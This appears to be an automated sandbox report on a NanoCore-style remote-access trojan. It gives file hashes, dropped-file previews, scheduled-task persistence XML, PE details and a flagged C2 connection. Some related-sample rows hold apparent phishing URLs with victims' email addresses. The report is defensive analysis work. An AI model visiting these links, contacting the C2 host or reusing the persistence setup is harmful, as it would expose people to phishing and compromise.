	test9.exe	Get hash	malicious	Browse	66.45.228.160
	https://firebasestorage.googleapis.com/v0/b/iouyfgjkgh.appspot.com/o/WEBMAIL.html?alt=media&token=f21ff97e-0c97-456a-9a4b-10962301f5d2#salim.mamlouk@holding-kamph.com	Get hash	malicious	Browse	64.20.38.219
	https://firebasestorage.googleapis.com/v0/b/nnajnr.appspot.com/o/WEBMAIL.html?alt=media&token=de90d2b5-b8b1-4623-87f1-c5411b10395b#asegura@talgo.com	Get hash	malicious	Browse	64.20.38.219

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Purchase Order PDF pdf.exe	Get hash	malicious	Browse
	Orden CW62125Q, pdf.exe	Get hash	malicious	Browse
	7444478441.js	Get hash	malicious	Browse
	7444478441.js	Get hash	malicious	Browse
	7444478441.js	Get hash	malicious	Browse
	5HuSdWXs4n.exe	Get hash	malicious	Browse
	ABU.exe	Get hash	malicious	Browse
	LI-TAK P0 TVOP CK-20-08-30 203008,pdf.exe	Get hash	malicious	Browse
	ppp.exe	Get hash	malicious	Browse
	787774778.js	Get hash	malicious	Browse
	12477123690.js	Get hash	malicious	Browse
	12477123690.js	Get hash	malicious	Browse
	order pdf.exe	Get hash	malicious	Browse
	Documents RF V23665.exe	Get hash	malicious	Browse
	78547744787.js	Get hash	malicious	Browse
	58669333.js	Get hash	malicious	Browse
	58669333.js	Get hash	malicious	Browse
	78547744787.js	Get hash	malicious	Browse
	78547744787.js	Get hash	malicious	Browse
	order.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.20894581699571
Encrypted:	false
SSDEEP:	768:NElGiBcBuiyFjUwF0wdP9/rJMDnRFRJfStGpwV3e3qtAcy:ilGBu7jjP9/tMDn9Jt+VO3GO
MD5:	88BBB7610152B48C2B3879473B17857E
SHA1:	0F6CF8DD66AA58CE31DA4E8AC0631600EF055636
SHA-256:	2C7ACC16D19D076D67E9F1F37984935899B79536C9AC6EEC8850C44D20F87616
SHA-512:	5BACDF6C190A76C2C6A9A3519936E08E898AC8A2B1384D60429DF850BE778860435BF9E5EB316517D2345A5AAE201F369863F7A242134253978BCB5B2179CA58
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Purchase Order PDF pdf.exe, Detection: malicious, Browse Filename: Orden CW62125Q, pdf.exe, Detection: malicious, Browse Filename: 7444478441.js, Detection: malicious, Browse Filename: 7444478441.js, Detection: malicious, Browse Filename: 7444478441.js, Detection: malicious, Browse Filename: 5HuSdWXs4n.exe, Detection: malicious, Browse Filename: ABU.exe, Detection: malicious, Browse Filename: LI-TAK P0 TVOP CK-20-08-30 203008,pdf.exe, Detection: malicious, Browse Filename: ppp.exe, Detection: malicious, Browse Filename: 787774778.js, Detection: malicious, Browse Filename: 12477123690.js, Detection: malicious, Browse Filename: 12477123690.js, Detection: malicious, Browse Filename: order pdf.exe, Detection: malicious, Browse Filename: Documents RF V23665.exe, Detection: malicious, Browse Filename: 78547744787.js, Detection: malicious, Browse Filename: 58669333.js, Detection: malicious, Browse Filename: 58669333.js, Detection: malicious, Browse Filename: 78547744787.js, Detection: malicious, Browse Filename: 78547744787.js, Detection: malicious, Browse Filename: order.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z.....................@........... ........@.. .......................@......99....@.....................................S.......`/................... ....................................................... ............... ..H............text....... ...................... ..`.rsrc...`/.......0..................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\MSBuild.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	325
Entropy (8bit):	5.334380084018418
Encrypted:	false
SSDEEP:	6:Q3LadLCR22IAQykdL1tZbLsbFLIP12MUAvvro6ysGMFLIP12MUAvvrs:Q3LaJU20NaL1tZbgbe4MqJsGMe4M6
MD5:	65CE98936A67552310EFE2F0FF5BDF88
SHA1:	8133653A6B9A169C7496ADE315CED322CFC3613A
SHA-256:	682F7C55B1B6E189D17755F74959CD08762F91373203B3B982ACFFCADE2E871A
SHA-512:	2D00AC024267EC384720A400F6D0B4F7EDDF49FAF8AB3C9E6CBFBBAE90ECADACA9022B33E3E8EC92E4F57C7FC830299C8643235EB4AA7D8A6AFE9DD1775F57C3
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	441
Entropy (8bit):	5.388715099859351
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U2+gYhD5itZbgbe4MqJsGMe4M6:MLF20NaL32+g2OH4xvn4j
MD5:	88F0104DB9A3F9BC4F0FC3805F571B0D
SHA1:	CDD4F34385792F0CCE0A844F4ABB447C25AB4E73
SHA-256:	F6C11D3D078ED73F2640DA510E68DEEAA5F14F79CAE2E23A254B4E37C7D0230F
SHA-512:	04B977F63CAB8DE20EA7EFA9D4299C2E625D92FA6D54CA03EECD9F322E978326B353824F23BEC0E712083BDE0DBC5CC4EE90922137106B096050CA46A166DF0E
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1287
Entropy (8bit):	5.229307073850279
Encrypted:	false
SSDEEP:	24:2do4+S8Tcqd2r6gFwvbIrovlgU3ODOiIQRvh7hwZgvw43aVdyZEiTbn:c+XB2mbIrovl33ODOiLdKZgfoIt/
MD5:	17923A8153452A388A2DBDB5AA8118BE
SHA1:	B2BAE36FAF1E841516B3B122704C5D3CDE82D4DA
SHA-256:	66CC1714F3E1AC319A5FCB027577AFD9E4CEF6E9B03C945D73B7781D030A7D30
SHA-512:	6EA5A088FAA554EB447DFDC04CF004278F3578CE66E2E05CA5F0B50A545EC8E7FB9F365446F0867C1D400D8546F55A098A0C5437D24A9FD5FDB3031C9EEEEE99
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version = "1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.<RegistrationInfo>.<Date>2015-09-27T14:27:44.8929027</Date > .<Author>899552\user</Author>.</RegistrationInfo>.<Triggers>.<LogonTrigger>.<Enabled>true</Enabled>.<UserId>899552\user</UserId>.</LogonTrigger>.<RegistrationTrigger>.<Enabled>false</Enabled>.</RegistrationTrigger>.</Triggers>.<Principals>.<Principal id="Author">.<UserId>899552\user</UserId>.<LogonType>InteractiveToken</LogonType>.<RunLevel>LeastPrivilege</RunLevel>.</Principal>.</Principals>.<Settings>.<MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.<AllowHardTerminate>false</AllowHardTerminate>.<StartWhenAvailable>true</StartWhenAvailable>.<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.<IdleSettings>.<StopOnIdleEnd>true</StopOnIdleEnd>.<RestartOnIdle>false</RestartOnIdle>.</IdleSettings>.<AllowStartOnDemand>true</AllowStartOnDemand>.<Enabled>true</Enabled>.<Hidden>fals

C:\Users\user\AppData\Local\Temp\Temp\images.exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	271370
Entropy (8bit):	7.8736012263539585
Encrypted:	false
SSDEEP:	6144:Nqh+mUvToYfwuCiXri8Z/0jdKOs1dcxjc15ONu:NcUvTtwVqFZ2Dxjc3y
MD5:	0B77D13126DDB4FE1012DEF81EA16914
SHA1:	EFC2ABFBA1A703C8F069727CEFC48AA3DF6D0F95
SHA-256:	415839939DCFD7D536A5F2BA9BBFFE95B33E6196B8168BAAB617813FF9A75FC9
SHA-512:	C5C76E17E5509E6D59885468ED9AEE3920BBEFBF3612DEA63B96649C1424B21E731391CA50A37345F13F0846926AFC069F7AC68535BE351D6555AB0E0A26C8BA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Zo..4<..4<..4<.<..4<.<..4<.<..4<..O<..4<..5<..4<.<..4<.<..4<.<..4<Rich..4<........................PE..L....._.................f..........~.............@..........................`............@.................................L........@.......................P......................................P...@............................................text...td.......f.................. ..`.rdata........... ...j..............@..@.data...............................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp182E.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	5.136963558289723
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnc2xtn:cbk4oL600QydbQxIYODOLedq3ZLj
MD5:	AE766004C0D8792953BAFFFE8F6A2E3B
SHA1:	14B12F27543A401E2FE0AF8052E116CAB0032426
SHA-256:	1ABDD9B6A6B84E4BA1AF1282DC84CE276C59BA253F4C4AF05FEA498A4FD99540
SHA-512:	E530DA4A5D4336FC37838D0E93B5EB3804B9C489C71F6954A47FC81A4C655BB72EC493E109CF96E6E3617D7623AC80697AD3BBD5FFC6281BAFC8B34DCA5E6567
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp1B1D.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.109425792877704
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
MD5:	5C2F41CFC6F988C859DA7D727AC2B62A
SHA1:	68999C85FC7E37BAB9216E0099836D40D4545C1C
SHA-256:	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
SHA-512:	B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
MD5:	9E7D0351E4DF94A9B0BADCEB6A9DB963
SHA1:	76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
SHA-256:	AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
SHA-512:	93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators, with overstriking
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:zrDP:fDP
MD5:	06FC58F9927778A61F43FE9613879AF5
SHA1:	5AB2C91B11AB018ADE2B61CE0AB5C87800FA0046
SHA-256:	19C6998695CA227D07148CEDF0DE018EDD4FB5F99B46AABAC9964B30483EA378
SHA-512:	DE1AA02C219A2583FCBEB941CBEB4230D3E4E3EAB985BE0AFDF06E3D5BCC45CE0A8921DD71852C07F8CA0F353BBD90A0C2100B58B5EA255CEE759F2836F4C41A
Malicious:	true
Preview:	.k.....H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	426832
Entropy (8bit):	7.999527918131335
Encrypted:	true
SSDEEP:	6144:zKfHbamD8WN+JQYrjM7Ei2CsFJjyh9zvgPonV5HqZcPVT4Eb+Z6no3QSzjeMsdF/:zKf137EiDsTjevgArYcPVLoTQS+0iv
MD5:	653DDDCB6C89F6EC51F3DDC0053C5914
SHA1:	4CF7E7D42495CE01C261E4C5C4B8BF6CD76CCEE5
SHA-256:	83B9CAE66800C768887FB270728F6806CBEBDEAD9946FA730F01723847F17FF9
SHA-512:	27A467F2364C21CD1C6C34EF1CA5FFB09B4C3180FC9C025E293374EB807E4382108617BB4B97F8EBBC27581CD6E5988BB5E21276B3CB829C1C0E49A6FC9463A0
Malicious:	false
Preview:	..g&jo...IPg...GM....R>i...o...I.>.&.r{....8...}...E....v.!7.u3e.. .....db...}.......".t(.xC9.cp.B....7...'.......%......w.^.._.......B.W%.<..i.0.{9.xS...5...)..w..$..C..?`F..u.5.T.X.w'Si..z.n{...Y!m...RA...xg....[7...z..9@.K.-...T..+.ACe....R....enO.....AoNMT.\^....}H&..4I...B.:..@..J...v..rI5..kP......2j....B..B.~.T..>.c..emW;Rn<9..[.r.o....R[....@=...:...L.g<.....I..%4[.G^.~.l'......v.p&.........+..S...9d/.{..H.`@.1..........f.\s...X.a.].<.h...J4...k.x....%3.......3.c..?%....>.!.}..)(.{...H...3..`'].Q.[sN..JX(.%pH....+......(...v.....H...3..8.a_..J..?4...y.N(..D.h..g.jD..I...44Q?..N......oX.A......l...n?./..........$.!..;.^9"H...........OkF....v.m_.e.v..f...."..bq{.....O.-....%R+...-..P.i..t5....2Z# ...#...,L..{..j..heT -=Z.P;...g.m)<owJ].J..../.p..8.u8.&..#.m9...j%..g&....g.x.I,....u.[....>./W...........X...bZ...ex.0..x.}.....Tb...[..H_M._.^N.d&...g._."@4N.pDs].GbT.......&p........Nw...%$=.....{..J.1....2....<E{..<!G..

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.85263908467479
Encrypted:	false
SSDEEP:	3:oMty8WbSI1u:oMLWuI1u
MD5:	A35128E4E28B27328F70E4E8FF482443
SHA1:	B89066B2F8DB34299AABFD7ABEE402D5444DD079
SHA-256:	88AEA00733DC4B570A29D56A423CC5BF163E5ACE7AF349972EB0BBA8D9AD06E1
SHA-512:	F098E844B5373B34642B49B6E0F2E15CFDAA1A8B6CABC2196CEC0F3765289E5B1FD4AB588DD65F97C8E51FA9A81077621E9A06946859F296904C646906A70F33
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

\Device\ConDrv Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	306
Entropy (8bit):	4.969261552825097
Encrypted:	false
SSDEEP:	6:zx3M1tlAX8bSWR30qysGMQbSVRRZBXVRbJ0fFdCsq2UTiMdH8stCal+n:zK1XnV30ZsGMIG9BFRbQdCT2UftCM+
MD5:	F227448515085A647910907084E6728E
SHA1:	5FA1A8E28B084DA25A1BBC51A2D75810CEF57E2C
SHA-256:	662BA47D628FE8EBE95DD47B4482110A10B49AED09387BC0E028BB66E68E20BD
SHA-512:	6F6E5DFFF7B17C304FB19B0BA5466AF84EF98A5C2EFA573AF72CFD3ED6964E9FD7F8E4B79FCFFBEF87CE545418C69D4984F4DD60BBF457D0A3640950F8FC5AF0
Malicious:	false
Preview:	Microsoft (R) Build Engine Version 2.0.50727.8922..[Microsoft .NET Framework, Version 2.0.50727.8922]..Copyright (C) Microsoft Corporation 2005. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.873728502504083
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe
File size:	271360
MD5:	ee4555ac614048e36aae067b6a032951
SHA1:	c7559fe7c094d4643ea3ab09c071fa0ac8ec18a4
SHA256:	3a2278374596d368ec773c10d54ec91f69445144248769abb155de58215d8c2c
SHA512:	620f7a6440caa0d16dc3e466b4078850d76e05c292d92225046d1ba1672a4ff550f601418344637554ab046ed1c96864c00702c75e6f5fb3b42454985ebcc03d
SSDEEP:	6144:Nqh+mUvToYfwuCiXri8Z/0jdKOs1dcxjc15ONu:NcUvTtwVqFZ2Dxjc3y
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Zo..4<..4<..4<...<..4<...<..4<...<..4<..O<..4<..5<..4<...<..4<...<..4<...<..4<Rich..4<........................PE..L......_...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40147e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FBBD6F3 [Mon Nov 23 15:36:19 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b0701deda97f8f775ded6a80cfec3216

Entrypoint Preview

Instruction
call 00007F9360F8323Eh
jmp 00007F9360F81A49h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00442778h], eax
mov dword ptr [00442774h], ecx
mov dword ptr [00442770h], edx
mov dword ptr [0044276Ch], ebx
mov dword ptr [00442768h], esi
mov dword ptr [00442764h], edi
mov word ptr [00442790h], ss
mov word ptr [00442784h], cs
mov word ptr [00442760h], ds
mov word ptr [0044275Ch], es
mov word ptr [00442758h], fs
mov word ptr [00442754h], gs
pushfd
pop dword ptr [00442788h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044277Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00442780h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044278Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004426C8h], 00010001h
mov eax, dword ptr [00442780h]
mov dword ptr [0044267Ch], eax
mov dword ptr [00442670h], C0000409h
mov dword ptr [00442674h], 00000001h
mov eax, dword ptr [0040A004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0040A008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [00000090h]

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x964c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44000	0x10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x45000	0x70c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9350	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x198	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6474	0x6600	False	0.612132352941	data	6.57687344022	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1fc0	0x2000	False	0.36865234375	data	5.50028935513	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x391fc	0x38800	False	0.983156457412	data	7.98418937184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x44000	0x10	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x45000	0xeda	0x1000	False	0.39306640625	data	3.79564261107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	GetConsoleWindow, GetProcAddress, LoadLibraryA, CloseHandle, GetStringTypeW, GetStringTypeA, LCMapStringW, MultiByteToWideChar, LCMapStringA, GetLocaleInfoA, HeapSize, RtlUnwind, HeapReAlloc, VirtualAlloc, HeapAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, HeapFree, VirtualFree, HeapCreate, InterlockedDecrement, GetCurrentThreadId, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetLastError, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError
MSACM32.dll	acmMetrics, acmStreamReset, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW
RPCRT4.dll	I_RpcNsBindingSetEntryNameW, NdrComplexArrayBufferSize, I_RpcIfInqTransferSyntaxes, RpcBindingServerFromClient, NDRSContextMarshall, RpcRevertToSelfEx
OLEAUT32.dll	VarCyFromUI4, VarDecFromDate, LPSAFEARRAY_UserUnmarshal, OleLoadPictureEx, VarR4FromBool
WINMM.dll	mmioDescend, mixerGetLineInfoA, mmioInstallIOProcA, midiInGetErrorTextA, mmTaskCreate, waveInGetErrorTextA, waveOutGetPosition, mmioAdvance
MPR.dll	WNetCancelConnection2A, WNetCancelConnectionA, WNetGetResourceParentA, WNetConnectionDialog1A, WNetGetResourceParentW, WNetDisconnectDialog1W, WNetUseConnectionA, WNetConnectionDialog, WNetGetUniversalNameA, WNetGetProviderNameA
USER32.dll	ShowWindow, CallWindowProcW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/28/20-17:49:17.283033	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49723	24980	192.168.2.3	209.159.151.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2020 17:49:01.251102924 CET	443	49690	204.79.197.200	192.168.2.3
Nov 28, 2020 17:49:01.251230001 CET	49690	443	192.168.2.3	204.79.197.200
Nov 28, 2020 17:49:17.149760962 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.253833055 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.253953934 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.283032894 CET	49723	24980	192.168.2.3	209.159.151.5
Nov 28, 2020 17:49:17.404994011 CET	24980	49723	209.159.151.5	192.168.2.3
Nov 28, 2020 17:49:17.405109882 CET	49723	24980	192.168.2.3	209.159.151.5
